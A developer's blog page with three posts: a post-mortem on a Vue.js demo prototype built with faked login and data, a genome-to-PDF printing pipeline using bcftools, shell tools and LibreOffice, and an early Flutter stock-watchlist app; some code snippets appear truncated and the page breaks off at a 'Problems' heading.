danielbiegler.de

From idea to prototype overnight: A Vue.js Post-Mortem

Daniel Biegler — Sat, 06 Jun 2020 19:53:00 +0000

Preamble

This post tells the story of the lessons I learned when I prototyped a webapp over night to improve the workflow of engineers at a Fortune 500 company. What went right, what wrong and what would I do differently the next time.

What the project was about

A good friend of mine approached me and asked whether or not I would be able to help them improve the situation at their workplace. I inquired more details and found out that their employer suffers from what I succinctly call "departmentalization induced data dispersion".

This seems to be an inevitable pain of growing bigger and losing track of data scattered across or even inside departments themselves. Employees need different documents, reports, Excel sheets, PDFs, manuals / books, the company intranet, etc.

Who doesn't love sending different revisions of a file back and fourth via email? Fun for the whole family! :)

People with decision making power often overlook the pains of the engineers that need to waste thousands of dollars worth of time hunting for information to do their jobs. We are talking about highly qualified, well paid engineers and managers; Invite a team to a meeting that could have been an email and congratulations, this just cost you over a couple thousand bucks.

I love improving and or automating tedious tasks so I set out to help and built a prototype overnight.

The Problem

My friend needs to manually hunt for documents, reports, sheets, etc. to retrieve information about different hardware parts. This can get rather complicated and time intensive because there can be nuanced differences between the same part depending on where it was manufactured. Private company research papers by different researchers need to be found, consulted and referenced which can take a considerable amount of time.

The Solution

A centralized, searchable and shareable information hub to quickly filter through lots of data points. Additionally the option for future customizability in terms of automating tasks, for example automatically pulling quotes from and citing private research papers.

My approach

As a programmer I immediately thought about the architecture. How does everything fit together, how do the systems work with each other, how would I expand the functionality, how would the site be hosted, how would I maintain quality and correctness of data, etc. etc. etc.

But then I caught myself and remembered a good presentation by Jake Knapp, which I highly recommend!

I do not need to fully build out the idea.
Properly planning the project out (at this point) is unnecessary.
We are just interested in getting feedback about the proposition. That's key.

Anybody that worked with a huge client most likely experienced the dread of writing mails for weeks if not months, ughhh. Things move slowly in the enterprise world. Before something happens, there are several approvals needed and somebody somewhere needs to get that email again and decisions get postponed and yada, yada, yada.

It's simply not worth it to put in the time for a project of this size before you get approval in writing.

We as engineers love the technical details and inner workings of things, but a person responsible for allocating budgets is most likely just interested in:

How does this help?
How does it look like?
How much does this cost?
How long will this take?

All of these points can be answered without the need for a proper working MVP, which means that the more time efficient way of handling this opportunity, or rather this proposal, is: Faking it, until you sign the deal.

What does "Faking it" mean

Let me quickly elaborate on the meaning of "faking something" tech related, because people outside of tech often have a negative view on the expression.

So for this project, let's say you have a device, be it a laptop or phone, and you want to retrieve a list of available hardware parts. In a real environment it would look like this:

The device requests data through the inter-/ or intranet from somewhere else e.g. a database on a server.

Now, if you'd want to genuinely make this happen you need to worry about the reachability of the server, credentials, security, error messages, managing the data itself and all the things that I omitted just now. None of this is impossible of course, but it costs time. Unnecessary time.

To avoid all of this, we simply can include the needed data beforehand and just pretend that we're fetching it from somewhere else. From an outside view these two methods will look exactly the same:

Real

Start loading animation
Request data
Receive data
End Loading animation
Use data

Fake

Start loading animation
Wait one second
End loading animation
Use data

Not only does this save time, this also reduces the points of possible failures during a presentation.

Imagine trying to sell your product and failing right in front of your client. Yikes. Germans have a succinct word for it called "Vorführeffekt" which translates to "presentation effect" and describes the situation when you tried something and made sure it works but as soon as you present it to someone, it simply fails.

So, "faking it" is not bad in this context. It both saves you time and reduces things you need to worry about. After signing the deal, depending on how careful you were, you 'just' need to replace the code where you send and receive data.

My Prototype

1. Login

A Login-Page is a must. The service would, of course, need to be gated and controlled.

Now comes the first "fake-feature". How do you implement a Login that needs to look like it works?

You have a boolean variable isLoggedIn which indicates whether or not the user is logged in. The input fields do nothing. The Login-Button simply sets the variable to true.

Yea.. ¯\_(ツ)_/¯

The purpose of the Login-Page was not to (directly) sell the prototype. I wanted it to set the mood for the first impression and hopefully intrigue the viewers as to what's behind the auth-wall. I had hoped that the Login-Page functions as an introduction of sorts, to evoke a feeling of "alright, this proposal isn't just a loose page that someone threw together, this is a proper useable thing".

2. Search

After you successfully log in, you are shown the meat of the project, the Search-Page. Originally the advanced search drawer would be closed, but for this post I screenshotted it open so that you can see everything in one image.

I think the interface is pretty self explanatory. You can type in a query, potentially apply some filters and hit the Search-Button. This isn't rocket science.

What I'd like to emphasize though, is that it's important to create the experience of your thing working. What would it look like when we search for something?

Sorry, your browser doesn't support embedded videos, but don't worry, you can download it and watch it with your favorite video player!

It looks pretty realistic and smooth, eh? Of course you can't properly implement a working solution over night, but what you can implement is - the experience of how it would look/feel like. Remember we were just interested in receiving feedback.

// The Search function simply
// updates the loading-bar and
// sets up the table entries after a delay.
search: function() {
  this.searchProgress = 0.1;

  // Wait for 200ms => 25% Progress
  setTimeout(() => {
    this.searchProgress = 25;
  }, 200);

  // Wait for 1s => 100% Progress
  setTimeout(() => {
    this.searchProgress = 100;

    // Wait for 500ms => Reset & Update the table
    setTimeout(() => {
      this.searchProgress = 0;
      this.tableEntries = generateRandomTableEntries();
    }, 500);

  }, 1000);

}

Just wait a little and update values. No networking, no data validation, no errors. Keep it simple, stupid.

You can click on the table entries which take you to their profile page.

3. Part Profile

These are a key feature, they enable colleagues to share the URLs via Email for example. These would be important reference points for users to come back to from time to time. They are a hub with all the information and functions you might need.

Here you can very easily provide additional value through (future) functionality. New fields, new buttons, automation for tedious tasks.

How the presentations went

With the experience now "working", the prototype was ready to be presented to the first round of people: Colleagues and the manager.

The presentation went smoothly and it got lots of praise: For the design, ease of use and the potential that it shows. The engineers and more importantly the manager immediately were on board and wanted to escalate the proposal to the decision-makers, namely the people that have power over budget assignments.

That took a while, because.. enterprise. Here's also an important lesson: You need to wait for a contract before you celebrate. This is just business, don't take it personal. Talk is very cheap and easy, in 99% of cases it isn't even meant to be misleading. Things just don't work out, it genuinely happens. As with this project.

The engineers and manager were all very interested and elevated the proposal. It got reviewed by higher-ups and again, lots of praise. But now it was time to talk about allocating budget for implementation and this is where it sadly stopped. They simply weren't able to allot enough budget for this project. Maybe with different timing it could have been different but that doesn't matter now.

This obviously made me unhappy but this is just business. It wasn't personal and that's alright.

What would I do differently next time

This whole project happend a long time ago and now I'm way more experienced with Vue.js so I'd make use of it's ecosystem a lot more. Namely I would use the awesome Vue Router, the Vuex Store and the Vue CLI.

At the point when I built this prototype, I needed to deliver as fast as possible and I wasn't too familiar with those things. I knew what they do and that I should use them in the long run, but I just stuck to what I was comfortable with in order to retain my development speed.

Now in hindsight, I would proceed like so:

Use the Vue CLI to quickly setup the project. Include the Vue Router and Store in the setup step.
Use the Vue Router in order to support different URLs and to be able to still contain the whole project in a single file.
Use the Vuex Store in order to abstract the request/retrieval of data away.

While this isn't technically needed for a simple demo like this, this approach would be a lot cleaner and would enable you to reuse more code, if you need to expand upon the demo.
Contain everything in a single HTML File. Build the JS, the SCSS, convert images to Base64 and include all of them in a single file.

Vue Router would have saved me so much hassle. Did you wonder how I made the Part-Profile-Page for every part without a router? I created a Node.js script that generates parts

for(const part of parts) {

  for(const footprint of footprints) {

    for(const coating of coatings) {

      const item = {
        // I omitted lots of lines
        // for your viewing pleasure.
      };

      output.push(item);
    }
			
  }
		
}

then reads a Template-HTML that I created with a specific "marker"

new Vue({
  el: '#app',
  data: {
    profile: {}//REPLACEMEHEREPLS
  },

  // Etc.
});

and replaces the marker with the generated data. When that's done, it gets written to disk.

const replacedTemplateContent =
(fs.readFileSync(
  partProfileTemplatePath,
  { encoding: 'utf8' })
)
.replace('{}//REPLACEMEHEREPLS', partDataReplacement);

fs.writeFileSync(replacedTemplateName, replacedTemplateContent);

After all, necessity is the mother of invention, haha.

If there's enough interest, I could rebuild this project with my current knowledge and open source it. Let me know!

Conclusion

If you're only interested in presenting something to decision-makers in order to get feedback, implementing a fully featured MVP is unnecessary. Save yourself a lot of time by "faking" functionality. Of course you should know how you'd expand on your prototype but don't go out of your way and spend unnecessary time over implementation details. Create the experience of your thing working.
The enterprise realm moves slowly. Decisions need time and nothing is certain as long as there aren't signed contracts. No contract, no champagne.
Use what you're familiar with so that you can iterate as fast as possible. With my current knowledge I could have completed this project even faster and cleaner but you're always gonna be smarter in hindsight. Hindsight is good, let it improve the future You. Creating something that people can actually see and use, has a lot more value than just plans, ideas or promises.
Depending on who you are trying to impress, you probably should make it look pretty and polished; Use the company colors and or the design language. The first impression is worth a lot and if you can induce the feeling of your product "fitting in", you're one step closer.

My design got lots of praise and I believe that this contributed to how fast my proposal got elevated to the decision-makers.
Make the prototype as easily shareable as possible. No setup! Remember, the less moving parts, the less can break, the better. At best you just have a single file. People will then be able to simply forward your whole thing via email. USB sticks in big corporations and or sensitive work environments are often forbidden and no decision maker is interested in unpacking zip files.

Awesome photo by Stefan Stefancik from Pexels

Visualizing genome data, working with contemporary artist Davide Balula

Daniel Biegler — Fri, 10 Jan 2020 19:27:00 +0000

Abstract

I worked together with the wonderful french artist Davide Balula to visualize his genome for an art exhibition.

I was responsible for preparing and processing the needed sequencing data and coming up with a technique that allows me to design and create PDF files that span tens of thousands of pages.

Definitely check out his other works too; I personally was deeply fascinated by the mimed sculptures.

How it all began
The project idea
Here come the problems
Original hypothesis
Breakthrough
First printing test
Processing and assembling sequence data
Processing pipeline step by step
Conclusion

How it all began

Some time ago, fellow redditor charrcheese posted the following image where they made their computer "draw" DNA sequences.

I'm a real sucker for computer generated art. Naturally, I had to play around with this to create something of my own, so I went to the comment section and asked if the source code was available.

Long story short, I sat down and wrote this page to scratch this new itch of mine. You can change colors, and play around with different methods for "drawing" the sequences.

After all of this was over, I got contacted by contemporary artist Davide Balula.

The project idea

Davide imagined printing the DNA-sequences of his chromosomes in book form, potentially accompanying them with visualizations for his next exhibition in Paris.

I knew from my own work with large amounts of data that this won't be easy. Prior to Davides message, I'd already looked up the Human Genome Project over at NCBI for a personal project of mine.

Here come the problems

If you ever tried to open or copy/paste a file that's over a couple hundred mega-/gigabytes, you might have noticed that sometimes this happens:

Well, figuratively speaking of course.

Naturally this is not news and there are many programs (gedit, 010 Editor, ..) to look at and edit huge files - but - those didn't suit my needs.

In my case, I needed to be able to design the layout of the text for printing.

This is where huge files will get on your nerves. Word processors like LibreOffice, Word and Pages are simply not designed to support this much data.

They use too much RAM, load forever, eventually get unresponsive and even if you manage to open something big, try switching the font size now.

Yeah, not gonna happen.

Original hypothesis

I have worked with LaTeX before and I thought that I could easily design a page and \include my text. For those that don't know what I'm talking about, Wikipedia got your back:

LaTeX is a document preparation system. When writing, the writer uses plain text as opposed to the formatted text found in WYSIWYG ("what you see is what you get") word processors like Microsoft Word, LibreOffice Writer and Apple Pages.

In theory, this sounds exactly like something that I need. I don't have the graphical overhead of the word processors and I can generate arbitrary documents.

Did some digging and found the seqsplit and the dnaseq packages that enable me to do what I need to do.

seqsplit – Split long sequences of characters in a neutral way

When one needs to type long sequences of letters (such as in base-sequences in genes) [...]

dnaseq – Format DNA base sequences
Defines a means of specifying sequences of bases. The bases may be numbered (per line) and you may specify that subsequences be coloured. [...]

Standard procedure, I thought - Write your document, include the necessary packages, compile it - and then...

LaTeX hugs your RAM very tightly and dies miserably.

Uggghh oh well, that sucks.

I did some research and found that luatex, unlike pdflatex, allocates memory dynamically. (i.e. doesn't crash with big input)

Me: "This is awesome."

Narrator: "It really wasn't."

The processing time, even for small amounts of data, is insane. That is a big no-no.

While technically lualatex works, it figuratively takes forever. I needed a better solution.

Stackexchange had some useful comments which sounded great at first:

1. Use Enscript in conjunction with ps2pdf

Enscript
[...] converts ASCII files to PostScript [...]

ps2pdf
[...] converts PostScript files to Portable Document Format (PDF) files.

2. Use text2pdf, Pandoc or unoconv which all do similar things except that this caught my attention:

unoconv
a command line tool to convert any document format that LibreOffice can import to any document format that LibreOffice can export

LibreOffice? Yeah.

3. Use LibreOffice

Wait. Didn't I rule out this Word processor?

I was trying out the different solutions and they didn't work like I wanted them to, so I kept scrolling and found out that LibreOffice itself supports operating without a graphical user interface!

Me: "This is awesome."

Narrator: "It was. Kinda."

First progress

LibreOffice has a very neat command line option for converting a file into a different format, in my case: PDF.

Usage is very easy:

$ libreoffice --convert-to pdf [your_file]

Here I took the time for the 21st chromosome:

$ time libreoffice --convert-to pdf chromosome_21.fna
convert /tmp/chromosome_21.fna -> /tmp/chromosome_21.pdf using filter : writer_pdf_Export
  
libreoffice --convert-to pdf chromosome_21.fna
125.04s user
1.50s system
99% cpu
2:06.78 total

Only around 2 minutes for a 46MB file! That's what I'm talking about.

Here is the first page of the output PDF:

The output PDF is 9897 pages long. Could be worse. Let's run a longer sequence:

$ time libreoffice --convert-to pdf chromosome_01.fna
convert /tmp/chromosome_01.fna -> /tmp/chromosome_01.pdf using filter : writer_pdf_Export
  
libreoffice --convert-to pdf chromosome_01.fna
2328.58s user
8.64s system
99% cpu
39:01.99 total

39 minutes for a 242MB file results in 52903 pages.

From a time-cost perspective, this is a huge win.

These PDFs will cost real money though, so ~63000 pages for only 2/24 chromosomes doesn't fly. The inner margins and the font size are way too generous.

I need to be able to change the layout, which unfortunately the libreoffice command does not directly support.

What it does support however, is converting .odt files, its document file format.
(Similar to .docx of Microsoft Word)

.odt files contain, besides the content itself, layout information!

Breakthrough

Because I've been watching videos of the excellent IT Security Engineer Gynvael Coldwind, I learned quite a bit about the Zip file format which led me to this thought process:

Create a test.odt document, containing:

Document formats are pretty much always just zip files, which you can extract.

$ unzip -l test.odt                                  
Archive:  test.odt
  Length      Date    Time    Name
---------  ---------- -----   ----
       39  2018-08-15 14:52   mimetype
      353  2018-08-15 14:52   Thumbnails/thumbnail.png
        0  2018-08-15 14:52   Configurations2/accelerator/
        0  2018-08-15 14:52   Configurations2/popupmenu/
        0  2018-08-15 14:52   Configurations2/toolpanel/
        0  2018-08-15 14:52   Configurations2/menubar/
        0  2018-08-15 14:52   Configurations2/images/Bitmaps/
        0  2018-08-15 14:52   Configurations2/toolbar/
        0  2018-08-15 14:52   Configurations2/floater/
        0  2018-08-15 14:52   Configurations2/statusbar/
        0  2018-08-15 14:52   Configurations2/progressbar/
     3532  2018-08-15 14:52   content.xml
      971  2018-08-15 14:52   meta.xml
      899  2018-08-15 14:52   manifest.rdf
    10834  2018-08-15 14:52   settings.xml
    11157  2018-08-15 14:52   styles.xml
      978  2018-08-15 14:52   META-INF/manifest.xml
---------                     -------
    28763                     17 files

I personally have never done this before, but content.xml sounds interesting.

Let's have a look:



... many lines omitted
for your viewing pleasure ...

Testdanielbiegler.de

Aha!

There at the very bottom, are our test strings. How about we change Test to does this work?.

...
does this work?danielbiegler.de

Re-zip the content.xml into our test.odt:

$ zip test.odt content.xml 
updating: content.xml
	zip warning: Local Entry CRC does not match CD: content.xml
 (deflated 75%)

And finally, try to open it:

Yes, it works.

This opens up the whole layout-power of the word processor without needing to open the large sequence data.

Bottleneck

While researching all of this, I was wondering why the processing takes so unbelievably long and it turns out that line-breaks and word-wrapping play a huge role. Here are some stats for y'all:

Here you can see that in the beginning, text with line breaks (orange) has a small advantage over text without line breaks (blue).

But what happens when we increase our character count, since our data is much bigger than a couple hundred thousand characters(?):

Whoopsie daisy.

Now that is pretty much the definition of a bottleneck, oh my..

Our data is a lot larger than a million characters, which means to be able to compile all the PDFs in a realistic time manner, line breaks are mandatory.

Font Kerning

In typography, kerning is the process of adjusting the spacing between characters in a proportional font, usually to achieve a visually pleasing result.

Theoretically, in our case, kerning would be useful to condense the sequence a bit more, saving paper.

However, this comes with the tradeoff that some lines in the book take more space than others. Some lines wont reach the end of the page, whereas some lines will need to wrap.

Remember, wrapping is bad - real bad.

To be able to properly set the line breaks, for higher performance, we'd need to calculate each line length and at that point we just do what the word processor does anyway.

To solve this, we can simply use a monospaced font i.e. a font with fixed spacing. Example:

With this, we know beforehand how many characters can fit on a single line. This allows us to optimally set line breaks! See here:

First printing test

For now it was important to figure out how small you can make the font while still having legible text. Here is an example of an earlier test Davide made:

The answer is around 4pt for font size. As you can see there's still very generous padding. We'll fix that later.

Now comes a little rant, stay strong. You'll get rewarded with the technical details afterwards!

Processing and assembling sequence data

Not gonna lie, this step was infuriating and frustrating to say the very least.

I do not have a background in bioinformatics but I consider myself to be capable of learning new things quickly and adapting to new situations quite easily. This step involves using software, so as a developer myself I thought, how hard can that be?

Writing software taught me to navigate in muddy areas; I assess and filter information quickly to achieve what I want.

Oh my sweet summer child.. sigh

As software devs we have the luxury of huge communities where pretty much every day-to-day topic can be found quickly and concisely. In the vast majority of cases you have a problem that somebody else had already encountered and fixed. This leads to very easily searchable answers.

But let's say you begin to dabble with very specific equipment and or very specific functionality. At some point it gets harder and harder to find useful information because the target audience shrinks drastically. It sounds a bit counter intuitive because having something specific should enable you to find specific things, right?

The number of relevant search results is already drastically reduced, but now you also have to find the specific wording to the question or discussion, otherwise this search result will be buried under junk. Think about the last time you needed to visit the second or third page of a google search? For me personally it's so rare that I genuinely do not remember, at all. I only remember being thoroughly disappointed every time because the results get extremely irrelevant really quickly.

Combine this fact with being absolutely new and ignorant to a highly specific and complicated area of higher studies. Information will start to feel like reading mandarin chinese to a foreigner (me).

Just as an example for this article, I randomly clicked a question that was on Biostars (a bioinformatics forum) and an answer reads like this, and I quote:

"We need to calculate the probability of three independent events happened together. The event is the choice of the genotype at the locus (SNP). The probability is estimated by the genotype frequency. Assuming the Hardy-Weinberg equilibrium is true, the frequency of genotype is p^2 for homozygous and 2pq for heterozygous genotypes, where p and q are the allele frequencies. Therefore, the frequency of AA-CC-AG profile would be" ...

Uhhh, yeah..

People that understood that paragraph probably cringe about me quoting this, but reading text where you only understand 50% of the words is an incredibly humbling experience. You should give it a try.

I knew it wouldn't be easy to digest all the info so I took my time to research different terminology and abbreviations, step by step, trying to inch forward.

After the lab got done processing and shipping the data to us, I began investigating on how to proceed with what data I had. The goal is to generate sequences, in FASTA format, from chromosome 1 through 22, X and Y.

I'm not going to detail every method that I tried, but what's important is, is that after some time passed I figured out that what I want to do is called a "Consensus Sequence".

There's a set of utilities, called SAMtools, that you can use to work with DNA sequence data.

After trying out a myriad of things and fixing several errors that occurred on the way I was still left with a message telling me the following:

[E::faidx_adjust_position] The sequence "chrM" was not found

Uhh, the what now? At this point I poured many hours into this whole ordeal and got scared that maybe the whole thing simply will not work.

But again, continuous trials, errors and coffee led me down a path of for some reason inspecting the header information of the BAM File.

$ samtools view -H data.bam

Which featured some output that I was not interested in.. except that at the very end a particular directory caught my eye.

/...
└─ DNA/
   └─ DNA_Human_WES/
      └─ DNA_Human_WES_2016b/
         └─ Database/
            └─ hg19/
               └─ fa/
                  └─ hg19.fasta

Some gears in my head started churning and it struck me like lightning. I have seen hg19 before!

I was really lucky to have not missed this detail because in reality it when I checked the headers out, it looked like this:

I mean, just look at it.

I felt such a big relieve when I accidentally spotted that.

When I first started playing with human sequences I found out you can download two different samples from NCBI: GRCh37 and GRCh38. Right now while writing this, I can't even recall why I knew what hg19 meant, but I know that I specifically remembered that hg19 is kind of a "synonym" for GRCh37 and NOT GRCh38.

I was trying to generate the consensus sequence with the `GRCh38` assembly instead of the `hg19` one. This was finally the breakthrough that I so desperately needed.

The last error I got was because of chrM (Mitochondrial DNA) which I found out is "new" notation which wasn't used when hg19 got created(, plus some additional differences).

With that roadblock finally out of the way I can create some PDFs.

Processing pipeline step by step

A little headsup:
This part is very technical and if you don't care about specifics you can skip ahead via this link.

Since I encountered quite a few problems, I tried compiling bcftools myself to get the newest possible version. You can get the source very conveniently from Github.

After compilation run and check the version via

$ ./bcftools --version
bcftools 1.9-210-gf1f261b
Using htslib 1.9-279-g49058f4
Copyright (C) 2018 Genome Research Ltd.
License Expat: The MIT/Expat license
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Alright seems to work.

In order to create the consensus sequence, we first need to call the variants.

This means we identify variants from sequence data i.e. where the aligned reads differ from the reference genome and write to a VCF file.

Here are the commands:

$ bcftools mpileup -Ou -f ref.fa input.bam | bcftools call -Ou -mv | bcftools norm -f ref.fa Oz -o calls.vcf.gz

This takes quite a while and produces the .vcf file that we need for the consensus sequence. Like I said earlier, make sure you have the proper reference!

So now we are able to construct the consensus sequence via:

$ bcftools consensus -f reference.fa calls.vcf.gz > consensus.fa

This was a big first step. Next we need to massage the data into the shape we need.

Massaging in this context means:

Cut a chromosome out of the consensus sequence
Remove comments and unneeded symbols
Fold the lines to a fixed length so we avoid line breaks (remember: performance!)
Add some markup so we can insert the sequence data into the LibreOffice document

1. Find out where the different chromosomes start and end so that you can carve them out of the consensus sequence.

Take a look at the first three lines of the consensus sequence:

$ head -n 3 consensus.fa
>chr1
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

All the sections are preceded by a comment featuring the greater-than character.

This makes it trivial to get the start plus the line number of every section via grep!

$ cat consensus.fa | grep --line-number "^>" | head -n 25 > comment_lines.txt

That output looks like this:

1:>chr1
4153951:>chr2
8207074:>chr3
11507294:>chr4
# ... and so forth

This enables us to precisely cut out each individual chromosome via stream editors like sed or awk. I used sed for this one.

For example the following means we want to output the lines (including) from line number 1 to 4153951, then we quit execution when we reach the next line 4153952. This is just a little performance trick to speed the processing up for large files.

$ sed -n "1,4153951p;4153952q" consensus.fa

We just cut out the first chromosome - easy!

2. Remove comments and unneeded symbols

On our mission to reduce the output size Davide and I decided that we'll strip unknown dna bases from the output. Also since the ranges from sed are inclusive we also need to omit the comment lines. (We could have done that in the previous step but it really doesn't matter).

The following means we want to omit all lines starting with a greater-than character i.e. all the comment lines.

$ grep -v '^>'

This we follow up with handy tr for deleting some unneeded symbols like the newline, N and n characters

$ tr -d '\nNn'

3. Fold the lines to a fixed length so we avoid line breaks

Getting rid of the line breaks for LibreOffice is of the essence, luckily theres the fold command which let's us specify how long each line should be!

The following means we want each line to be 123 characters wide

$ fold -w 123

4. Add some markup so we can insert the sequence data into the LibreOffice document

We need to insert the sequence data into a LibreOffice document file, because that is how we are going to convert to PDF. Remember from earlier, this is how text looks like inside the document file:

...

does this work?

danielbiegler.de

So we need to prepend

and append

to every single line of the sequence. That way LibreOffice knows which style (font size, font family, etc.) to apply to each line.

That's super easy with sed:

$ sed 's/^//' | sed 's/$/<\/text:p>/'

And now everything, properly in order, inside a little helper script:

#!/bin/bash
if [ $# -lt 5 ]; then
	echo "You need 5 arguments: start_line, end_line, /path/genome.fna, fold-width, /path/output"
	exit 1
fi

# $1: Start line, inclusive
# $2: End line, inclusive
# $3: Path to the DNA Data in fasta file format
# $4: Fold width to properly fit the page
# $5: Path to output content file

# cut out section				# ignore comments # rm stuff  # fold it	   # beginning of the line					  # end of the line		# write to file
sed -n "$1,$2p;$(($2+1))q" $3 | grep -v '^>' | tr -d '\nNn' | fold -w $4 | sed 's/^//' | sed 's/$/<\/text:p>/' > $5

Now it is super convenient to prepare our data for further processing; Here's how to prepare the first chromosome:

$ ./prepare_lines.sh 1 4153951 consensus.fa 123 chr1_prepared.xml

Easy as pie!

Writing another helper script that generates all of the chromosomes is highly recommended, because of the need for regeneration after changing the style of the document:

#!/bin/bash
./prepare_lines.sh   1         4153951     consensus.fa 123 chr1_prepared.xml
./prepare_lines.sh   4153951   8207074     consensus.fa 123 chr2_prepared.xml
./prepare_lines.sh   8207074   11507294    consensus.fa 123 chr3_prepared.xml
# ... and so forth ...

After preparing all the chromosomes we are finally in a position to create some PDFs!

Remember from earlier:

Retrieve the content.xml from our master.odt
Insert the sequence into the content.xml file
Rezip the content.xml into a document
Convert the document to PDF

1. Retrieve the content.xml from our master.odt

We know that we can simply unzip the master.odt file since we already experimented with that earlier, but what I found out is that you can unzip to stdout with the -p option! That way we don't need to store a temporary file. Neat.

# unpack to stdout
$ unzip -p master.odt content.xml

2. Insert the sequence into the content.xml file

This step is a little tricky. We use regular expressions to replace every line of text inside the document with a single REPLACEME. After that we replace that REPLACEME with the file contents of our prepared text. This allowed easier, visual sanity-checks while I developed the script.

# replace text with REPLACEME on seperate line
| perl -p -e 's/ content.xml

3. Rezip the content.xml into a document

Now we have a content.xml file that holds our prepared sequence. Simply rezip it into a document.

Since I wanted to preserve the master.odt, I decided to make a temporary copy of it and zip the new content into that one instead.

So first make a copy

$ cp master.odt temp_doc.odt

And now zip our prepared content into that:

$ zip temp_doc.odt content.xml

4. Convert the document to PDF

At this point we have a full featured and complete document at temp_doc.odt which we can convert to pdf using

$ libreoffice --convert-to "pdf" temp_doc.odt

These steps I put into a helper script which looks like this:

#!/bin/bash

# 1. /path/master.odt
# 2. /path/sequence_content.txt
# 3. /path/output.odt
if [ $# -lt 3 ]; then
	echo "You need 3 arguments: /path/master.odt, /path/sequence_content.txt, /path/output.odt"
	exit 1
fi

echo "Creating content.xml"
# unpack to stdout			# replace text with REPLACEME on seperate line     # replace with file contents
unzip -p $1 content.xml |	perl -p -e 's/ content.xml

echo "Copying $1 to $3"
cp $1 $3

echo "Adding content.xml to $3"
zip $3 content.xml

echo "Remove content.xml"
rm content.xml

echo "Creating PDF. This can take a while"
time libreoffice --convert-to "pdf" $3

echo "Remove $3"
rm $3

Here's how the current version looks like for the Y-Chromosome. Note the repeating patterns in our dna:

This post will be updated at a later time. Hopefully we can add some graphical visualisations using my site and hold the actual books in our hands! :)

Conclusion

This project taught me that in order to achieve your goal you have to persevere and iteratively improve. A good solution doesn't get good on the first try, step by step fine tuning is key. From ~53,000 pages down to ~5000 pages was the sum of it's individual parts.

Patience is another big thing. I wish I could show you how frustrated I felt with all the bioinformatics mess, oh boy. Trying to stay cool headed in a constantly frustrating environment is a damn life lesson if I've ever seen one.

Thanks for your time, I hope you enjoyed this. Let me know.

Writing my own Stock-Watchlist App in Flutter - Minimum Viable Experiment

Daniel Biegler — Fri, 27 Sep 2019 18:04:00 +0000

Been wanting to write an App for my phone since forever, before I even had a smartphone in fact, and nowadays had the note hanging on my whiteboard, judgingly looking at me.

This month (2019-09) I made this long had dream a reality.

What pushed me over the edge to start this

Maybe some of you know that this year (2019) I started my stock trading journey, so I started using a couple different finance apps to easily catch up on news, my watchlist, quickly look up prices for different instruments, you get the idea.

In the beginning this was enough for me, I was only getting started so I didn't exactly know what I want to know, what I want to see, how I want to interact with all the information.

Soon I'll be trading for a whole year and know a lot more than in the beginning.

Now I want things, I expect things and I wish for things from my tools.

Like I said, I tried out a couple of different apps, narrowed them down and ended up with using the Finanzen.net-App as my daily driver. And before I continue I'd like to mention that the devs working on that app are probably really nice people and I hold no grudge against them personally.

Here it goes: I am greatly dissatisfied with the app's perfomance - so much so in fact, that this genuinely is the straw that broke the camels back.

Freezes, bugs, bad user experience, oh boy countless bugs, missing functionality, more bugs, weird behaviour and last but not least.. the bugs - did I mention those?

Like I said, I do not intend to shit on individual devs but that app currently is in a state that it makes me not want to use it anymore.

So I set out to prove to myself that I could do better.

Developing an app - where to start?

So the first step is to prove to myself that I can do it. I like to break such a problem down to a MVP or MVE, "Minimum Viable Product" or "Minimum Viable Experiment" respectively.

If you ever thought about making a product you know that feeling of having a million ideas for features and stuff you want to have, but this more often than not culminates in a half baked project that gets abandoned half way through because you don't make much progress and lose interest. (Been there, done that..)

I found the key for me is to strive for a Minimally Viable Experiment.

Add all the stuff you think about to a backlog and strip out the most essential pieces, the core features that you need - not the ones you want. This is key. This helps you focus and to get something out the door. Don't spend time or at least don't spend much time on design. Make it work. A product that looks wonky, but works, still provides some value. A product that looks amazing but doesn't work is worthless.

Making the first prototype

I dove into Dart and Flutter instead of native Android Dev because I'd like to have the option to also release on iOS from the same codebase. Been seeing some talks at conferences about Flutter and it looked quite intriguing.

Read up on documentation, watch some tutorials, write code, read documentation, write some more code, watch some more tutorials, .. repeat over and over and then I got this:

The funny thing here is.. nothing worked, haha. The displayed text is hardcoded because I'm still learning how to display anything on the screen. The button just displays the predefined text, that's it.

I decided that I probably would need three or four "Pages", so to speak.

A dashboard for news, some sort of general analytics and the like
A search page so that I can look up securities
A place where I get detailed info about a security
A watchlist page where I can save securities to and look them up later

Next, I needed a way to search for securities and I looked at several APIs and websites that provide that functionality. I narrowed multiple possibilities down to the REST API of Börse Frankfurt because it is a very well made site that responds with very easily parseable JSON.

As an example, if you search for 'test' they respond with objects that look like this:

{
  "isin":"GB0031638363",
  "wkn":null,
  "symbol":null,
  "investmentCompany":null,
  "issuer":null,
  "type":"EQUITY",
  "typeName":{
    "originalValue":"EQUITY",
    "translations":{
      "de":"Aktie",
      "en":"Equity"
    }
  },
  "count":0,
  "name":{
    "originalValue":"INTERTEK GROUP     LS-,01",
    "translations":{
      "others":"Intertek Testing Services PLC"
    }
  }
}

Super duper comfortable to work with, hats off to you Börse Frankfurt.

Some tinkering later I got the very first search working:

Next, I made the results into a list so that I can scroll down properly:

I created a local sqlite database that holds a couple tables. For example I store some search data, securities and watchlist items. Then I made it possible to save and display items in said watchlist:

After that there was some dynamically generated info when you look up a specific security:

You see that Slider-Element under the chart? That let's you configure what chart you see from Intraday to one week, all up to ten years. That chart and slider is currently sort of just a placeholder before I implement a proper interactive chart.

In the name of prototyping quickly: Charts currently are just images that are being fetched from an API. Ultimately I'd like to implement charts where you can zoom in/out and show some very basic indicators. No actual trading will get done from the app so it doesn't have to be very comprehensive, some basic ones I'd like to have though.

Then I cleaned up the watchlist so that you get some useful data out of it:

It starts to look like something actually usable, eh?

Add the difference to the last trading day so you can spot harsh changes. On the left you can see the previous trading day and the difference in absolute and percentage values. On the right you can see how much your position is currently worth.

And with that shown, you now know the current state of my app.

Search for securities
Get some info about them
Safe them to a watchlist

It works pretty well so far, so I think I have proven to myself that I indeed am capable of solving my needs and fulfilling my dream of making a (good) app. It is super simple but serves its purpose of being a rough, minimum viable experiment!

Problems

